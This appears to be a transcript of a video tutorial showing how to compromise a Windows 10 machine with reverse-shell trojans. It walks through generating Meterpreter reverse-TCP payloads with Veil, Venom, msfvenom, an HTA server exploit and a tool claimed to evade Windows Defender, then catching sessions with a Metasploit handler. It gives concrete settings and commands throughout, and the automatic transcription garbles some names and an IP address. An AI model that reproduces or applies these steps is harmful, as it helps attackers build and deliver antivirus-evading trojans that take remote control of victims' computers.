Hi guys, welcome back to TechnoWeb Hack, and this is Parikshit here once again. In this video I will show you how to do the Windows 10 hacking by using various methods. As we have gone through in the previous video tutorial, like how to hack Windows 10 or any other machine by using tools like Venom, Whale and MSF Venom, all these things. So in this video also we will be looking into how we will hack a Windows 10 machine by using these tools like Whale, Venom, and here we have the MSF Venom. This is again the SSH server, which will help us create the file a Trojan that will execute at the target site. And here we have a PSEXE, the exploit, okay. And here we have a Zerika 2, okay. This is one of the latest application or the tool that they used to create Trojans, okay. So this is like a fully undetectable, so it means that it will definitely create a Trojan which will be undetectable by the Windows Defender, something like that, okay. So let's not waste our time and let's start it, okay. So first of all, what we will be doing is we will create a Trojans by using all these 5 tools, okay. And next we will be executing it at the target site, and we have here the MSF console open and Metasploit open, and we have already started the multi-handler here. We will be executing this Trojans which is created by the different tools, and then we will start the exploit handler in our Kali machine, and we should get the 5 meterpreter sessions in our side. So first of all we will create a Trojans by using a wheel tool, okay. So let's start it. So here we are under the wheel, and we will start using the number 1 as a wheel evasion. As then next you have to use or list the payload, and then use 16, so which is our meterpreter shell code, which is your meterpreter reverse TCP shell code. So lhost here we have to set, then set for the lhost, which is your local host IP address, then 192.168.83.43.87, yeah, and then enter. And you have to set the L port. By default it is set to 80, but we will set it to 4444, okay. Set it and then just generate it by using a generate command. Please enter the base name, which will be your output file name. So we will give it as a wheel payload, okay, or we'll give like a wheel TCP payload, all right, wheel TCP payload.exe, and then enter. So it will start creating the payload, and it will give us the location where it saves the shellcode, okay, the payload. So here you can see the executable is written to the var lib wheel output compiled folder. Here we have our file generated. So here you can go and you can check that file. So yeah, before I will show you where exactly that file is. So yeah, just minimize it, go to the var lib. So here go to var, okay, then library, so lib, and here you have to scroll down and check for the wheel. Here go to output file and compiled. So here you find your wheel TCP payload. We will simply copy this, okay, and we will go to our path, the shared folder which is there inside our Windows 10 system, and we will go ahead and we will paste it here, okay. We can see this is our wheel, the Trojan that we generated from the wheel tool, okay. Then next is the Venom tool, okay. So we will go ahead and generate the shell code which will be for the exe file. So we will choose 6, okay, enter the shellcode setting. So here you have to give lhost, which will be 192.168.43.87, which is your local host IP address. The L port you can set it to 4444, set enter, and then you have to give the Windows meterpreter reverse TCP which we'll be using, okay. And then it will start generating the shellcode, okay. So as you can see, the shellcode generation has started, okay. So it is finding these files and it is asking to give the shellcode name. So here we are using the Venom tool to create it, so that's why we are now giving as the name as a Venom. So Venom payload.exe, and then say okay. Alright, so yeah, Venom payload.exe has been generated. Now it is compiling it. So as of now it is asking to start the listener, but we will not start the listener as we will be using our Metasploit Metasploit listener, which is a multi-handler. So here we will not start it. Okay, so let's cancel it, and then yeah, so we'll cancel. And first of all, what we want by using this tool is to fast migrate to the exe, the explorer.exe. So we will say fast migrate and then okay. Alright, so it may start the handler, but we don't want the handler to be started. We just want to use the venom payload.exe later. So you can even close this. Okay, so as you can see, the file is generated and in the venom tool. Okay, output, and here you can see venom payload.exe is there. Let's just copy it and put it into our shared folder. Okay, so here we have a venom payload.exe. The next thing now we will be doing is generating trojans by using a MSF venom. Okay, so let's just copy this and paste it over here. Okay, so MSF venom -p, then Windows interpreter reverse TCP. You have to give the L host here, which is your localhost IP 192.168.43.87. you have to give the L port, so L port equal to 4444, and then -f is exe file, and then output file name will be payload.exe, which will generate under, so we want the output file to be MSF venom payload.exe. Alright, so this is all fine here. We don't want to use any other options from the list. Encoder we will not use, so it's fine. Let's see how it generates the MSF payload file by using MSF venom. Yeah, so as you can see there, no platform was selected, and by default it has chosen to the Windows. No architecture, so architecture has been selected as a x86, and so but yeah, still you can see that our file is saved by the name of the MSF venom payload.exe. Alright, so here you can go to the root home folder. Here we can see the MSF payload.exe file is there. Just copy it and put it into the shared folder. Okay, so next tool we have here is our HTA server. It's like exploit which will create a website that when the victim visits, it downloads the file, and that file will be malicious file which will give us the interpreter session after execution at the target site. Okay, so let's do this. So you can see the exploit is Windows MISC HTA server. So let's see what are the options that we have available here, and we have to set the SRV host and SRV port. So SRV port will be by default 8080. You have to set the SRV host, which I have already set to our localhost IP address. Now let's say exploit, and then it will start generating one of the URL like this, and I will put it into the shared folder. Okay, so we have here all the trojans available in our shared folder. So now we are going to execute the trojans one by one. Okay, so before that I will make sure I have the exploit multi-handler started here. I will first set the payload that we have set up for these trojans, which is our Windows interpreter and reverse TCP. Okay, so we have to set the L port as a 4444 while creating the trojans, and the L host will be your localhost IP address. Okay, so this is it set, and then we will exploit it. Okay, it started listening on 4444. Okay, as now we will go here and we will execute it one by one. So first of all we will do the wheel TCP payload. Okay, I executed that, and now we have come back here, and you can see a sending stage and interpreter session is open. Now I will do it background. Okay, session 2 is now in background. Now once again I will exploit it, and I will go back here, and now I will exploit or execute the venom payload. Okay, I executed the venom payload. As you can see now it is sending stage, and again another interpreter session is open for us. I will again make it background. Okay, and I will start exploiting again. Now this time I will exploit using a Zirica 2. Okay, you can see the another interpreter session is open with the same. Okay, again I will do this to background, and I will exploit it, so it will start listening on 4444. I will do it with MSF Venom payload this time. As you can see now, we'll come back here. Yeah, as you can see, the another interpreter session is open. I will do this background. Okay, as you can see, there are 5 sessions we got here. You can see the list of sessions by using sessions -l. Okay, you can see there are total 4 sessions that we got here, and you can connect to any of the sessions like by using a sessions -i and then session id. Suppose if I want to connect to the session number 4, so just type 4 here, and I'm connected to the session 4 now. Alright, so I will just make it background. I will now change the settings, because in this case now, which we have here, the malicious website. So I will first open it using a notepad. I will show you that. So this is the website that we need to visit, but here you can see the 8080 is the port where it should listen. So I have to change the port. To do this, we will set the L port to 8080, and now I will start exploiting it. So it will start listening on 8080. Now once like I visit to this website, okay, so as you can see, it should work here. Okay, sending stage, and it should give us the interpreter session, but most of the time it will fail and the interpreter session will die with this exploit. So it is always better to use the other tools, the MSF payload. Okay, so the MSF Venom, Wheel, Venom, and Zerica 2. So all these will help you exploit your Windows 10 machine by using Trojans. Okay, and the only thing that is there is you will have to disable the Windows Defender to get it work. But the Zerica 2 is the application or the tool that recently came up, and it will help bypass the Windows Defender in Windows 10 most of the time. Okay, so we have successfully compromised to Windows 10 machine by using various ways and by using various tools. Okay, so I hope you like this video, and this video is completely for the information purpose. Okay, and the next video we'll be looking into other different ways to hack into Windows Server, and then later on we will create videos on the Linux machine as well. Alright guys, so I hope you enjoyed. If you have not subscribed my channel, please subscribe it and hit the bell icon so that you will not miss the notifications for the videos that will be coming up. Okay, and please hit the like button, and thanks for watching, and bye bye.